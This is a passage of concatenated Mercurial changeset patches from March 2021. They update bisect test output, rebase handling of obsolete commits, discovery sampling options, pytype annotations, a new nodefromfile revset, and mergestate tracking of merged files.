updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -g # -> update to rev 9 - Testing changeset 9:3c77083deb4a (2 changesets remaining, ~1 tests) + Testing changeset 9:3c77083deb4a "9" (2 changesets remaining, ~1 tests) 1 files updated, 0 files 
merged, 0 files removed, 0 files unresolved $ hg bisect -b The first bad revision is: @@ -350,10 +350,10 @@ $ hg bisect -r $ hg bisect -g 18 $ hg bisect -b 1 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (13 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (13 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -361,7 +361,7 @@ 6:a214d5d3811a 18:d42e18c7bc9b $ hg bisect -b # -> update to rev 12 - Testing changeset 12:9f259202bbe7 (5 changesets remaining, ~2 tests) + Testing changeset 12:9f259202bbe7 "12" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -381,7 +381,7 @@ 13:b0a32c86eb31 15:857b178a7cf3 $ hg bisect -b # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (3 changesets remaining, ~1 tests) + Testing changeset 13:b0a32c86eb31 "13" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first good revision is: @@ -414,7 +414,7 @@ $ hg bisect -r $ hg bisect -g 1 $ hg bisect -b 16 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -422,13 +422,13 @@ 16:609d82a7ebae 17:228c06deef46 $ hg bisect -g # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, 
~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (8 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 12 - Testing changeset 12:9f259202bbe7 (8 changesets remaining, ~3 tests) + Testing changeset 12:9f259202bbe7 "12" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -443,10 +443,10 @@ 16:609d82a7ebae 17:228c06deef46 $ hg bisect -g # -> update to rev 9 - Testing changeset 9:3c77083deb4a (5 changesets remaining, ~2 tests) + Testing changeset 9:3c77083deb4a "9" (5 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 15 - Testing changeset 15:857b178a7cf3 (5 changesets remaining, ~2 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(ignored)' $ hg bisect -b @@ -500,13 +500,13 @@ $ hg bisect -r $ hg bisect -g 17 $ hg bisect -b 8 # -> update to rev 10 - Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 13 - Testing changeset 10:429fcd26f52d (5 changesets remaining, ~2 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 15 - Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets 
remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -524,7 +524,7 @@ 13:b0a32c86eb31 17:228c06deef46 $ hg bisect -s # -> update to rev 16 - Testing changeset 16:609d82a7ebae (3 changesets remaining, ~1 tests) + Testing changeset 16:609d82a7ebae "16" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -612,7 +612,7 @@ $ hg bisect -r $ hg bisect -b 17 $ hg bisect -g 11 - Testing changeset 13:b0a32c86eb31 (5 changesets remaining, ~2 tests) + Testing changeset 13:b0a32c86eb31 "13" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(ignored)' 2:051e12f87bf1 @@ -623,7 +623,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect -g - Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests) 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b The first bad revision is: @@ -665,7 +665,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect --extend - Extending search to changeset 8:dab8161ac8fc + Extending search to changeset 8:dab8161ac8fc "8" 2 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' $ hg log -q -r 'bisect(ignored)' @@ -677,7 +677,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect -g # dab8161ac8fc - Testing changeset 9:3c77083deb4a (3 changesets remaining, ~1 tests) + Testing changeset 9:3c77083deb4a "9" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 9:3c77083deb4a @@ -757,13 +757,13 @@ $ hg bisect -r $ hg bisect -b 13 $ hg bisect -g 8 - Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests) + Testing changeset 11:82ca6f06eccd "11" (3 
changesets remaining, ~1 tests) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 11:82ca6f06eccd 12:9f259202bbe7 $ hg bisect -g 2 - Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests) + Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests) 0 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 11:82ca6f06eccd diff --git a/tests/test-bisect3.t b/tests/test-bisect3.t --- a/tests/test-bisect3.t +++ b/tests/test-bisect3.t @@ -72,13 +72,13 @@ $ hg bisect --good 4 $ hg bisect --good 6 $ hg bisect --bad 12 - Testing changeset 9:2197c557e14c (6 changesets remaining, ~2 tests) + Testing changeset 9:2197c557e14c "9=8+3" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect --bad 10 - Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests) + Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect --skip 7 - Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests) + Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests) 0 files updated, 0 files merged, 0 files removed, 0 files unresolved test template diff --git a/tests/test-template-map.t b/tests/test-template-map.t --- a/tests/test-template-map.t +++ b/tests/test-template-map.t @@ -1606,7 +1606,7 @@ $ hg bisect -g 1 $ hg bisect -b 3 --noupdate - Testing changeset 2:97054abb4ab8 (2 changesets remaining, ~1 tests) + Testing changeset 2:97054abb4ab8 "no person" (2 changesets remaining, ~1 tests) $ hg log -T bisect -r 0:4 changeset: 0:1e4e1b8f71e0 bisect: good (implicit) # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616197003 -3600 # Sat Mar 20 00:36:43 2021 +0100 # Node ID 283828850c56676a65ac30f75a8819760f86147e # Parent f51ff655d338427150ab0fb23fd4c02136cae228 chg: kill 
trailing comma in SEE ALSO Differential Revision: https://phab.mercurial-scm.org/D10243 diff --git a/contrib/chg/chg.1 b/contrib/chg/chg.1 --- a/contrib/chg/chg.1 +++ b/contrib/chg/chg.1 @@ -36,6 +36,6 @@ .B \-\-kill\-chg\-daemon Terminate the background command servers. .SH SEE ALSO -.BR hg (1), +.BR hg (1) .SH AUTHOR Written by Yuya Nishihara <yuya@tcha.org>. # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616197077 -3600 # Sat Mar 20 00:37:57 2021 +0100 # Node ID 186c0f6fbc16da9c76318bbfe860ffde1fe3f415 # Parent 283828850c56676a65ac30f75a8819760f86147e tests: ask any chg instance to terminate before looking at sqlite dbs There are spurious errors in CI where the database is still locked, so force the daemon to quit to get deterministic behavior. Since the kill command itself is racy, also sleep 2s to give the server time to wake up and exit. Differential Revision: https://phab.mercurial-scm.org/D10244 diff --git a/tests/test-wireproto-exchangev2-shallow.t b/tests/test-wireproto-exchangev2-shallow.t --- a/tests/test-wireproto-exchangev2-shallow.t +++ b/tests/test-wireproto-exchangev2-shallow.t @@ -176,6 +176,10 @@ updating the branch cache (sent 5 HTTP requests and * bytes; received * bytes in responses) (glob) +#if chg + $ hg --kill-chg-daemon + $ sleep 2 +#endif $ sqlite3 -line client-shallow-1/.hg/store/db.sqlite << EOF > SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC; > EOF @@ -347,6 +351,10 @@ updating the branch cache (sent 5 HTTP requests and * bytes; received * bytes in responses) (glob) +#if chg + $ hg --kill-chg-daemon + $ sleep 2 +#endif $ sqlite3 -line client-shallow-narrow-1/.hg/store/db.sqlite << EOF > SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC; > EOF # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616180926 25200 # Fri Mar 19 12:08:46 2021 -0700 # Node ID 32399d0813e0eb583bec8ea65c9dd2657af41b77 # Parent 
186c0f6fbc16da9c76318bbfe860ffde1fe3f415 rebase: skip obsolete commits even if they have pruned successors Issue 5782 reported that `hg rebase -r <obsolete commit with pruned successor>` failed with an error saying that it would cause divergence. Commit b7e2cf114e85 (rebase: do not consider extincts for divergence detection (issue5782), 2018-02-09) fixed it by letting you rebase the commit. However, that fix seems inconsistent with how we handle `hg rebase -r <pruned commit>`. To me, it should make no difference whether a commit is pruned itself or if it has (only) pruned successors. This patch changes it so we treat these two kinds of commits the same way. I let the message we print remain "note: not rebasing <commit>, it has no successor" even though that last part is not technically correct for commits with pruned successors. I doubt it will confuse users. Differential Revision: https://phab.mercurial-scm.org/D10240 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -361,11 +361,9 @@ ( self.obsoletenotrebased, self.obsoletewithoutsuccessorindestination, - obsoleteextinctsuccessors, ) = _computeobsoletenotrebased(self.repo, obsoleteset, destmap) skippedset = set(self.obsoletenotrebased) skippedset.update(self.obsoletewithoutsuccessorindestination) - skippedset.update(obsoleteextinctsuccessors) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) def _prepareabortorcontinue( @@ -2192,13 +2190,9 @@ `obsoletewithoutsuccessorindestination` is a set with obsolete revisions without a successor in destination. - - `obsoleteextinctsuccessors` is a set of obsolete revisions with only - obsolete successors. 
""" obsoletenotrebased = {} obsoletewithoutsuccessorindestination = set() - obsoleteextinctsuccessors = set() assert repo.filtername is None cl = repo.changelog @@ -2212,11 +2206,8 @@ successors.remove(srcnode) succrevs = {get_rev(s) for s in successors} succrevs.discard(None) - if succrevs.issubset(extinctrevs): - # all successors are extinct - obsoleteextinctsuccessors.add(srcrev) - if not successors: - # no successor + if not successors or succrevs.issubset(extinctrevs): + # no successor, or all successors are extinct obsoletenotrebased[srcrev] = None else: dstrev = destmap[srcrev] @@ -2231,11 +2222,7 @@ if srcrev in extinctrevs or any(s in destmap for s in succrevs): obsoletewithoutsuccessorindestination.add(srcrev) - return ( - obsoletenotrebased, - obsoletewithoutsuccessorindestination, - obsoleteextinctsuccessors, - ) + return obsoletenotrebased, obsoletewithoutsuccessorindestination def abortrebase(ui, repo): diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete.t @@ -1294,18 +1294,16 @@ o 0:b173517d0057 a $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" + note: not rebasing 2:a82ac2b38757 c "c", it has no successor $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c + * 4:76be324c128b d | - | * 4:76be324c128b d + | x 3:ef8a456de8fa c1 (pruned) | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b + x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) |/ + o 1:488e1b7e7341 b + | o 0:b173517d0057 a $ cd .. 
# HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616002850 -3600 # Wed Mar 17 18:40:50 2021 +0100 # Node ID 13d973690ecd1f3cde7c2f96a23267eedecf5ab9 # Parent 32399d0813e0eb583bec8ea65c9dd2657af41b77 debugdiscovery: document relevant config option These config option are here for people to experiment with it. So lets document them in the command that is used for experimentation. Differential Revision: https://phab.mercurial-scm.org/D10231 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1011,6 +1011,35 @@ be "replaced" by a subset of the local repository using the `--local-as-revs` flag. This is useful to efficiently debug pathological discovery situation. + + The following developer oriented config are relevant for people playing with this command: + + * devel.discovery.exchange-heads=True + + If False, the discovery will not start with + remote head fetching and local head querying. + + * devel.discovery.grow-sample=True + + If False, the sample size used in set discovery will not be increased + through the process + + * devel.discovery.grow-sample.rate=1.05 + + the rate at which the sample grow + + * devel.discovery.randomize=True + + If andom sampling during discovery are deterministic. It is meant for + integration tests. 
+ + * devel.discovery.sample-size=200 + + Control the initial size of the discovery sample + + * devel.discovery.sample-size.initial=100 + + Control the initial size of the discovery for initial change """ opts = pycompat.byteskwargs(opts) unfi = repo.unfiltered() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616004628 -3600 # Wed Mar 17 19:10:28 2021 +0100 # Node ID f165105400d00ed790fb2cacebd37f076bfcf423 # Parent 13d973690ecd1f3cde7c2f96a23267eedecf5ab9 setdiscovery: rearrange code deciding if we will grow the sample The new code is clearer and will make the next update simpler. Differential Revision: https://phab.mercurial-scm.org/D10232 diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -429,13 +429,12 @@ # full blown discovery # if the server has a limit to its arguments size, we can't grow the sample. - hard_limit_sample = remote.limitedarguments grow_sample = local.ui.configbool(b'devel', b'discovery.grow-sample') - hard_limit_sample = hard_limit_sample and grow_sample + grow_sample = grow_sample and not remote.limitedarguments randomize = ui.configbool(b'devel', b'discovery.randomize') disco = partialdiscovery( - local, ownheads, hard_limit_sample, randomize=randomize + local, ownheads, not grow_sample, randomize=randomize ) if initial_head_exchange: # treat remote heads (and maybe own heads) as a first implicit sample @@ -454,7 +453,7 @@ ui.debug(b"taking initial sample\n") samplefunc = disco.takefullsample targetsize = fullsamplesize - if not hard_limit_sample: + if grow_sample: fullsamplesize = int(fullsamplesize * samplegrowth) else: # use even cheaper initial sample # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616004360 -3600 # Wed Mar 17 19:06:00 2021 +0100 # Node ID 2b1b8f3e6510b9f7923372fd6d26820885a52edf # Parent f165105400d00ed790fb2cacebd37f076bfcf423 setdiscovery: add a 
discovery.grow-sample.dynamic option The current discovery dynamically adapt to complex situations. This makes it quick and effective, but also harder so study the effects of other improvements in such complex situation. So we add a new option to control this too. Differential Revision: https://phab.mercurial-scm.org/D10233 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -737,6 +737,14 @@ b'discovery.grow-sample', default=True, ) +# When discovery.grow-sample.dynamic is True, the default, the sample size is +# adapted to the shape of the undecided set (it is set to the max of: +# <target-size>, len(roots(undecided)), len(heads(undecided) +coreconfigitem( + b'devel', + b'discovery.grow-sample.dynamic', + default=True, +) # discovery.grow-sample.rate control the rate at which the sample grow coreconfigitem( b'devel', diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1024,6 +1024,12 @@ If False, the sample size used in set discovery will not be increased through the process + * devel.discovery.grow-sample.dynamic=True + + When discovery.grow-sample.dynamic is True, the default, the sample size is + adapted to the shape of the undecided set (it is set to the max of: + <target-size>, len(roots(undecided)), len(heads(undecided) + * devel.discovery.grow-sample.rate=1.05 the rate at which the sample grow diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -429,12 +429,16 @@ # full blown discovery # if the server has a limit to its arguments size, we can't grow the sample. 
- grow_sample = local.ui.configbool(b'devel', b'discovery.grow-sample') + configbool = local.ui.configbool + grow_sample = configbool(b'devel', b'discovery.grow-sample') grow_sample = grow_sample and not remote.limitedarguments + dynamic_sample = configbool(b'devel', b'discovery.grow-sample.dynamic') + hard_limit_sample = not (dynamic_sample or remote.limitedarguments) + randomize = ui.configbool(b'devel', b'discovery.randomize') disco = partialdiscovery( - local, ownheads, not grow_sample, randomize=randomize + local, ownheads, hard_limit_sample, randomize=randomize ) if initial_head_exchange: # treat remote heads (and maybe own heads) as a first implicit sample # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616108241 14400 # Thu Mar 18 18:57:21 2021 -0400 # Node ID 9ff4672c8c26df3f7134d738cd771a7e35b85aac # Parent 2b1b8f3e6510b9f7923372fd6d26820885a52edf revlog: convert an Abort message to bytes Flagged by pytype. Differential Revision: https://phab.mercurial-scm.org/D10234 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -3250,7 +3250,7 @@ # rewriting entries that already have sidedata is not # supported yet, because it introduces garbage data in the # revlog. - msg = "Rewriting existing sidedata is not supported yet" + msg = b"Rewriting existing sidedata is not supported yet" raise error.Abort(msg) entry = entry[:8] entry += (current_offset, len(serialized_sidedata)) # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616125260 14400 # Thu Mar 18 23:41:00 2021 -0400 # Node ID 2c0e35f6957abab074d2a96ab4e1dbc58349b3e2 # Parent 9ff4672c8c26df3f7134d738cd771a7e35b85aac typing: mark the argument to mercurial.i18n.gettext() non-Optional Few if any of the callers are handling a `None` return, which is making pytype complain. 
I tried adding @overload definitions to indicate the bytes -> bytes and None -> None relationship, but pytype doesn't seem to apply that to `_()` through the function assignment. What did work was to change `_()` into its own function that called `gettext()`, but that has an extra function call overhead. Even putting that function into an `if pycompat.TYPE_CHECKING` block and leaving the existing assignments in the `else` block caused pytype to lose track of the @overloads. At that point, I simply gave up. PyCharm doesn't like that it can return None, given the new type hints, but pytype doesn't complain about this nor does it see any callers passing None. The most important thing here is to catch str being passed anyway. Differential Revision: https://phab.mercurial-scm.org/D10235 diff --git a/mercurial/i18n.py b/mercurial/i18n.py --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -23,7 +23,6 @@ from typing import ( Callable, List, - Optional, ) @@ -71,7 +70,7 @@ def gettext(message): - # type: (Optional[bytes]) -> Optional[bytes] + # type: (bytes) -> bytes """Translate message. The message is looked up in the catalog to get a Unicode string, # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616128110 14400 # Fri Mar 19 00:28:30 2021 -0400 # Node ID b26f9560f40d53ec9a8afa912265754662b32b16 # Parent 2c0e35f6957abab074d2a96ab4e1dbc58349b3e2 commands: necessary annotations and assertions to pass pytype This is a slightly less forceful incarnation of D7384, where pytype can be appeased with some assertions rather than disabling warnings. 
Differential Revision: https://phab.mercurial-scm.org/D10236 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -76,6 +76,12 @@ stringutil, ) +if pycompat.TYPE_CHECKING: + from typing import ( + List, + ) + + table = {} table.update(debugcommandsmod.command._table) @@ -3295,7 +3301,8 @@ ) # checking that newnodes exist because old state files won't have it elif statedata.get(b'newnodes') is not None: - statedata[b'newnodes'].append(node) + nn = statedata[b'newnodes'] # type: List[bytes] + nn.append(node) # remove state when we complete successfully if not opts.get(b'dry_run'): @@ -7268,6 +7275,12 @@ dest = dbranch = dother = outgoing = None if opts.get(b'remote'): + # Help pytype. --remote sets both `needsincoming` and `needsoutgoing`. + # The former always sets `sother` (or raises an exception if it can't); + # the latter always sets `outgoing`. + assert sother is not None + assert outgoing is not None + t = [] if incoming: t.append(_(b'1 or more incoming')) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616007995 -3600 # Wed Mar 17 20:06:35 2021 +0100 # Node ID 56d441256e82837d0ed7d1a834a9181a6af570d3 # Parent b26f9560f40d53ec9a8afa912265754662b32b16 revset: introduce a `nodefromfile` revset I though we had one, but actually we don't seem to. So here is a revset to reuse a list of node previously stored. Differential Revision: https://phab.mercurial-scm.org/D10230 diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1335,6 +1335,29 @@ return subset & rs +@predicate(b'nodefromfile(path)') +def nodefromfile(repo, subset, x): + """ + An alias for ``::.`` (ancestors of the working directory's first parent). + If file pattern is specified, the histories of files matching given + pattern in the revision given by startrev are followed, including copies. 
+ """ + path = getstring(x, _(b"nodefromfile require a file path")) + listed_rev = set() + try: + with pycompat.open(path, 'rb') as f: + for line in f: + n = line.strip() + rn = _node(repo, n) + if rn is not None: + listed_rev.add(rn) + except IOError as exc: + m = _(b'cannot open nodes file "%s": %s') + m %= (path, encoding.strtolocal(exc.strerror)) + raise error.Abort(m) + return subset & baseset(listed_rev) + + @predicate(b'all()', safe=True) def getall(repo, subset, x): """All changesets, the same as ``0:tip``.""" @@ -1697,13 +1720,9 @@ return subset & names -@predicate(b'id(string)', safe=True) -def node_(repo, subset, x): - """Revision non-ambiguously specified by the given hex string prefix.""" - # i18n: "id" is a keyword - l = getargs(x, 1, 1, _(b"id requires one argument")) - # i18n: "id" is a keyword - n = getstring(l[0], _(b"id requires a string")) +def _node(repo, n): + """process a node input""" + rn = None if len(n) == 40: try: rn = repo.changelog.rev(bin(n)) @@ -1712,7 +1731,6 @@ except (LookupError, TypeError): rn = None else: - rn = None try: pm = scmutil.resolvehexnodeidprefix(repo, n) if pm is not None: @@ -1721,6 +1739,17 @@ pass except error.WdirUnsupported: rn = wdirrev + return rn + + +@predicate(b'id(string)', safe=True) +def node_(repo, subset, x): + """Revision non-ambiguously specified by the given hex string prefix.""" + # i18n: "id" is a keyword + l = getargs(x, 1, 1, _(b"id requires one argument")) + # i18n: "id" is a keyword + n = getstring(l[0], _(b"id requires a string")) + rn = _node(repo, n) if rn is None: return baseset() diff --git a/tests/test-default-push.t b/tests/test-default-push.t --- a/tests/test-default-push.t +++ b/tests/test-default-push.t @@ -137,6 +137,7 @@ $ hg --config 'paths.default:pushrev=notdefined()' push pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) hg: parse error: unknown identifier: notdefined + (did you mean nodefromfile?) 
[10] $ hg --config 'paths.default:pushrev=(' push diff --git a/tests/test-revset.t b/tests/test-revset.t --- a/tests/test-revset.t +++ b/tests/test-revset.t @@ -3108,3 +3108,18 @@ $ log 'expectsize(0:2, :2)' abort: revset size mismatch. expected between 0 and 2, got 3 [255] + +Test getting list of node from file + + $ hg log -r '0:2' -T '{node}\n' > some.nodes + $ hg log -r 'nodefromfile("some.nodes")' -T '{rev}\n' + 0 + 1 + 2 + $ hg log -r 'nodefromfile("missing-file")' -T '{rev}\n' + abort: cannot open nodes file "missing-file": $ENOENT$ + [255] + $ echo bad-node > bad.nodes + $ hg log -r 'nodefromfile("bad.nodes")' -T '{rev}\n' + $ echo abcdefabcdefabcdeabcdeabcdeabcdeabcdeabc > missing.nodes + # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1615362272 -19800 # Wed Mar 10 13:14:32 2021 +0530 # Node ID 5a0b930cfb3ee0dba307a80b0ca90b4ff4cfb823 # Parent 56d441256e82837d0ed7d1a834a9181a6af570d3 commit: get info from mergestate whether a file was merged or not While commiting a merge, the commit code does not know whether a file was merged during `hg merge` or not. This leads the commit code to look for filelog ancestor to choose parents of new filelog created on merge commit. This leads to wrong results in some cases as demonstrated by previous patch. From this patch, we start storing information about merged files in mergestate in stateextras and then use that on commit to detect whether we need to set two parents or not. Differential Revision: https://phab.mercurial-scm.org/D10149 diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -361,6 +361,8 @@ elif fparent2 != nullid: if ms.active() and ms.extras(fname).get(b'filenode-source') == b'other': fparent1, fparent2 = fparent2, nullid + elif ms.active() and ms.extras(fname).get(b'merged') != b'yes': + fparent1, fparent2 = fparent1, nullid # is one parent an ancestor of the other? 
else: fparentancestors = flog.commonancestorsheads(fparent1, fparent2) diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -1698,6 +1698,7 @@ tocomplete = [] for f, args, msg in mergeactions: repo.ui.debug(b" %s: %s -> m (premerge)\n" % (f, msg)) + ms.addcommitinfo(f, {b'merged': b'yes'}) progress.increment(item=f) if f == b'.hgsubstate': # subrepo states need updating subrepoutil.submerge( @@ -1713,6 +1714,7 @@ # merge for f, args, msg in tocomplete: repo.ui.debug(b" %s: %s -> m (merge)\n" % (f, msg)) + ms.addcommitinfo(f, {b'merged': b'yes'}) progress.increment(item=f, total=numupdates) ms.resolve(f, wctx) diff --git a/tests/test-backout.t b/tests/test-backout.t --- a/tests/test-backout.t +++ b/tests/test-backout.t @@ -718,6 +718,7 @@ ancestor path: foo (node f89532f44c247a0e993d63e3a734dd781ab04708) other path: foo (node f50039b486d6fa1a90ae51778388cad161f425ee) extra: ancestorlinknode = 91360952243723bd5b1138d5f26bd8c8564cb553 + extra: merged = yes $ mv .hg/merge/state2 .hg/merge/state2-moved $ hg debugmergestate -v no version 2 merge state diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -946,8 +946,7 @@ $ hg ci -m "mFB-change-m-0 $case_desc - the other way" created new head $ hg manifest --rev . --debug | grep " d" - 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset missing-correct-output !) - 646ed7992dec41eb29635ab28268e7867d0e59a0 644 d (no-changeset known-bad-output !) + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !) cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) #if no-changeset $ hg debugindex d | ../no-linkrev @@ -961,7 +960,6 @@ 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 7 * d55cb4e9ef57 000000000000 000000000000 8 * 1c334238bd42 7b79e2fe0c89 000000000000 - 9 * 646ed7992dec 7b79e2fe0c89 d8252ab2e760 (known-bad-output !) 
#else $ hg debugindex d | ../no-linkrev rev linkrev nodeid p1 p2 @@ -1917,10 +1915,12 @@ ##### revision "mFB-change-m-0 merge with extra change - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (known-bad-output !) - merged : d, ; (known-bad-output !) - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (missing-correct-output !) - touched : d, ; (missing-correct-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) + touched : d, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) + merged : d, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) + merged : d, ; (upgraded known-bad-output !) ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3357,13 +3357,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFB-change-m-0")' M b A d - h (filelog missing-correct-output !) - a (filelog known-bad-output !) - h (sidedata !) - h (upgraded !) - h (upgraded-parallel !) - h (changeset !) - h (compatibility !) + h A t p R a @@ -3422,10 +3416,6 @@ | : o : f-1: rename h -> i :/ - o i-2: c -move-> d, s -move-> t (known-bad-output !) - | (known-bad-output !) - o i-1: a -move-> c, p -move-> s (known-bad-output !) - 